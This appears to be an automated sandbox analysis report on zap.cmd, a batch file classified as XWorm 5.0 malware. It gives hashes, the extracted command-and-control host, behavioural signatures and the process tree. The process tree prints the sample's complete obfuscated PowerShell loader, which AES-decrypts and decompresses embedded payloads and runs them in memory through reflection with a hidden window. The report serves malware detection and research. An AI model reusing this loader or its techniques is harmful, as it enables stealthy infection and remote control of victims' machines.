Analysis
  Max time kernel: 149s
  Max time network: 151s
  Platform: windows10-2004_x64
  Resource: win10v2004-20240426-en
  Resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  Submitted: 23-05-2024 16:26
  Static task: static1
  Behavioral task: behavioral1
    Sample: zap.cmd
    Resource: win7-20240220-en
General
  Target: zap.cmd
  Size: 65KB
  MD5: 85c9311ae0014ac8bb98089d0bd51bdc
  SHA1: 5140e9beda6014b02df3c09f84a284f9c25532ca
  SHA256: 152cbca849779c40fe6673458a9e25e4be0b080f7cb4db8cfee5a88cec74b1e5
  SHA512: f202a1e07afb444e5264cd28f7c0eedd55a3d002d14f989bf9fb065fd451be1df6197b5dcb61c616e8dbd1d3ba43cdc058192c89858c8bc292c199d5e8e9fb54
  SSDEEP: 768:std2pH1E6G5dMQzfwXLyVM0rAQiB/tp6UTGKxHHVpMGgJxhvtsQekLpzmWnfCB3Q:fpH1E6YrfDSF+UaaLtE1sQeAJ2Zlg9
Malware Config
  Extracted
    Family: xworm
    Version: 5.0
    C2: hjxwrm5.duckdns.org:8896
    MSmkrgH8xVI2Dczk
    install_file: USB.exe
Signatures

  Detect Xworm Payload (1 IoCs)
    Resource: behavioral2/memory/4776-30-0x0000019D69D60000-0x0000019D69D70000-memory.dmp
    YARA rule: family_xworm

  Blocklisted process makes network request (1 IoCs)
    Flow  PID   Process
    27    4776  powershell.exe

  Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
    Run Powershell and hide display window.
    PID   Process
    4776  powershell.exe
    3100  powershell.exe

  Suspicious behavior: EnumeratesProcesses (5 IoCs)
    PID   Process
    4776  powershell.exe
    4776  powershell.exe
    3100  powershell.exe
    3100  powershell.exe
    4776  powershell.exe

  Suspicious use of AdjustPrivilegeToken (2 IoCs)
    Description              PID   Process
    Token: SeDebugPrivilege  4776  powershell.exe
    Token: SeDebugPrivilege  3100  powershell.exe

  Suspicious use of SetWindowsHookEx (1 IoCs)
    PID   Process
    4776  powershell.exe

  Suspicious use of WriteProcessMemory (12 IoCs)
    Description                        PID   Process         Target process
    PID 3684 wrote to memory of 4892   3684  cmd.exe         cmd.exe
    PID 3684 wrote to memory of 4892   3684  cmd.exe         cmd.exe
    PID 3684 wrote to memory of 4548   3684  cmd.exe         cmd.exe
    PID 3684 wrote to memory of 4548   3684  cmd.exe         cmd.exe
    PID 4548 wrote to memory of 2056   4548  cmd.exe         cmd.exe
    PID 4548 wrote to memory of 2056   4548  cmd.exe         cmd.exe
    PID 4548 wrote to memory of 4268   4548  cmd.exe         cmd.exe
    PID 4548 wrote to memory of 4268   4548  cmd.exe         cmd.exe
    PID 4548 wrote to memory of 4776   4548  cmd.exe         powershell.exe
    PID 4548 wrote to memory of 4776   4548  cmd.exe         powershell.exe
    PID 4776 wrote to memory of 3100   4776  powershell.exe  powershell.exe
    PID 4776 wrote to memory of 3100   4776  powershell.exe  powershell.exe
Processes

  Level 1: C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\zap.cmd"
    Signatures: Suspicious use of WriteProcessMemory

    Level 2: C:\Windows\system32\cmd.exe
      Command line: cmd /c \"set __=^&rem\

    Level 2: C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\zap.cmd
      Signatures: Suspicious use of WriteProcessMemory

      Level 3: C:\Windows\system32\cmd.exe
        Command line: cmd /c \"set __=^&rem\

      Level 3: C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\zap.cmd';$CMIY='ReazBIWdzBIWLzBIWinzBIWeszBIW'.Replace('zBIW', ''),'LXpsBoadXpsB'.Replace('XpsB', ''),'CXFxWopXFxWyTXFxWoXFxW'.Replace('XFxW', ''),'ChSZNiaSZNinSZNigSZNieExSZNiteSZNinSZNisiSZNionSZNi'.Replace('SZNi', ''),'DecehEzompehEzrehEzeehEzssehEz'.Replace('ehEz', ''),'EleFRIUmenFRIUtFRIUAFRIUtFRIU'.Replace('FRIU', ''),'InwXPBvowXPBkwXPBewXPB'.Replace('wXPB', ''),'GeAzGItCAzGIurAzGIrenAzGItAzGIPAzGIrocAzGIessAzGI'.Replace('AzGI', ''),'SWavzpWavzliWavztWavz'.Replace('Wavz', ''),'TrQRjDaQRjDnsQRjDfQRjDorQRjDmFiQRjDnQRjDaQRjDlQRjDBQRjDlQRjDoQRjDckQRjD'.Replace('QRjD', ''),'EQBEyntQBEyrQBEyyPQBEyoiQBEyntQBEy'.Replace('QBEy', ''),'CfrRUrefrRUatfrRUeDfrRUecrfrRUyptfrRUorfrRU'.Replace('frRU', ''),'FrostbEmBastbEse6stbE4SstbEtrstbEinstbEgstbE'.Replace('stbE', ''),'MlFlLailFlLnMlFlLolFlLdlFlLullFlLelFlL'.Replace('lFlL', '');powershell -w hidden;function iadMU($QWytb){$xHhyf=[System.Security.Cryptography.Aes]::Create();$xHhyf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$xHhyf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$xHhyf.Key=[System.Convert]::($CMIY[12])('tgQIjCkwwZqAzylw/Tfv+EER7SzcL8PBsCAaLmr+5qk=');$xHhyf.IV=[System.Convert]::($CMIY[12])('pSyOatGwmEbEIOKwBSvE0g==');$DSRRZ=$xHhyf.($CMIY[11])();$Quqau=$DSRRZ.($CMIY[9])($QWytb,0,$QWytb.Length);$DSRRZ.Dispose();$xHhyf.Dispose();$Quqau;}function XBiYS($QWytb){$uSNme=New-Object System.IO.MemoryStream(,$QWytb);$CliDx=New-Object System.IO.MemoryStream;$gFTqG=New-Object System.IO.Compression.GZipStream($uSNme,[IO.Compression.CompressionMode]::($CMIY[4]));$gFTqG.($CMIY[2])($CliDx);$gFTqG.Dispose();$uSNme.Dispose();$CliDx.Dispose();$CliDx.ToArray();}$uMaFe=[System.IO.File]::($CMIY[0])([Console]::Title);$zflDv=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 5).Substring(2))));$dcHsS=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 6).Substring(2))));[System.Reflection.Assembly]::($CMIY[1])([byte[]]$dcHsS).($CMIY[10]).($CMIY[6])($null,$null);[System.Reflection.Assembly]::($CMIY[1])([byte[]]$zflDv).($CMIY[10]).($CMIY[6])($null,$null); "

      Level 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass
        Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory

        Level 4: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

  C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rfdgqn0s.dxo.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  Memory dumps
    Resource                                                           Filesize
    memory/4776-14-0x0000019D69FA0000-0x0000019D6A016000-memory.dmp    472KB
    memory/4776-10-0x0000019D696D0000-0x0000019D696F2000-memory.dmp    136KB
    memory/4776-11-0x00007FFE39C20000-0x00007FFE3A6E1000-memory.dmp    10.8MB
    memory/4776-12-0x00007FFE39C20000-0x00007FFE3A6E1000-memory.dmp    10.8MB
    memory/4776-13-0x0000019D69D70000-0x0000019D69DB4000-memory.dmp    272KB
    memory/4776-0-0x00007FFE39C23000-0x00007FFE39C25000-memory.dmp     8KB
    memory/4776-26-0x0000019D69D40000-0x0000019D69D52000-memory.dmp    72KB
    memory/4776-27-0x00007FFE57BB0000-0x00007FFE57DA5000-memory.dmp    2.0MB
    memory/4776-28-0x00007FFE57100000-0x00007FFE571BE000-memory.dmp    760KB
    memory/4776-29-0x0000019D69D50000-0x0000019D69D5C000-memory.dmp    48KB
    memory/4776-30-0x0000019D69D60000-0x0000019D69D70000-memory.dmp    64KB
    memory/4776-32-0x00007FFE39C23000-0x00007FFE39C25000-memory.dmp    8KB
    memory/4776-33-0x00007FFE39C20000-0x00007FFE3A6E1000-memory.dmp    10.8MB